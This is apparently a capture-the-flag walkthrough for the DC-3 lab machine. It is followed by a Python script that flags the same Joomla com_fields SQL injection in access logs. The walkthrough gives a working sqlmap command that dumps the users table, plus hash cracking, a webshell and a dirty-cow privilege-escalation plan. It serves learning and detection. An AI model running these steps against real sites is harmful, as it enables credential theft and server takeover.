you can download it here: http://www.five86.com/downloads/DC-3.zip
use nmap to discover the target:
nmap -Pn 192.168.227.0/24
check port 80
use whatweb to scan the website
it is using joomla, try joomlavs
ruby joomlavs.rb --url http://192.168.227.138/ -a
it is vulnerable to SQL injection, which leads to RCE
tried msf, but failed because administrator is not logged in.
switch to sqlmap,
sqlmap -u "http://192.168.227.138/index.php/fr/?option=com_fields&view=fields&layout=modal&list[fullordering]=*" -D joomladb -T "#__users" -C username,password,email --dump -p "list[fullordering]" --dbms=mysql --technique E
use john to crack the hash and log in as admin to the website, install the language pack to get a shell
tried using nc and bash to get a reverse shell but failed, download a webshell first.
stuck for a while, tried suid, sudo, sensitive files, nothing.
try some exploits on the OS, uname -a && lsb_release -a
ubuntu 16.04, quite old, dirty-cow should work
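
From the defender's side, the com_fields request targeted with sqlmap above stands out in web server access logs. The following Python is an added example, not part of the original write-up: it assumes the "combined" access log format, and both the allowlist for list[fullordering] (a column name plus optional ASC/DESC) and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumption: Apache/Nginx "combined" access log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)
# Assumption: a legitimate ordering value is a column name plus optional direction.
SAFE_ORDER = re.compile(r'^[A-Za-z0-9_.]+(\s+(ASC|DESC))?$', re.IGNORECASE)

# Constructed sample lines (addresses, timestamps and values are made up).
SAMPLE_LOG = [
    '192.168.227.1 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?option=com_fields'
    '&view=fields&layout=modal&list[fullordering]=a.title%20ASC HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '192.168.227.129 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php/fr/?option=com_fields'
    '&view=fields&layout=modal&list%5Bfullordering%5D=%28SELECT%201%29 HTTP/1.1" 500 1024 "-" "curl/8.0"',
    '192.168.227.1 - - [01/Jan/2024:10:00:09 +0000] "GET /index.php?option=com_content'
    '&view=article&id=1 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

def suspicious_ordering(target):
    """Return the offending list[fullordering] value, or None if the request looks benign."""
    # parse_qsl percent-decodes keys and values, so list%5Bfullordering%5D is also caught.
    params = dict(parse_qsl(urlsplit(target).query, keep_blank_values=True))
    if params.get("option") != "com_fields":
        return None
    value = params.get("list[fullordering]")
    if not value or SAFE_ORDER.match(value):
        return None
    return value

def scan(lines):
    """Return (client_ip, status, value) for each request with a non-allowlisted ordering."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the assumed format
        value = suspicious_ordering(m.group("target"))
        if value is not None:
            hits.append((m.group("ip"), m.group("status"), value))
    return hits

if __name__ == "__main__":
    for ip, status, value in scan(SAMPLE_LOG):
        print(f"{ip} status={status} list[fullordering]={value!r}")
```

Only the query string is inspected, so requests that carry the parameter in a POST body need the same check at the application or WAF layer.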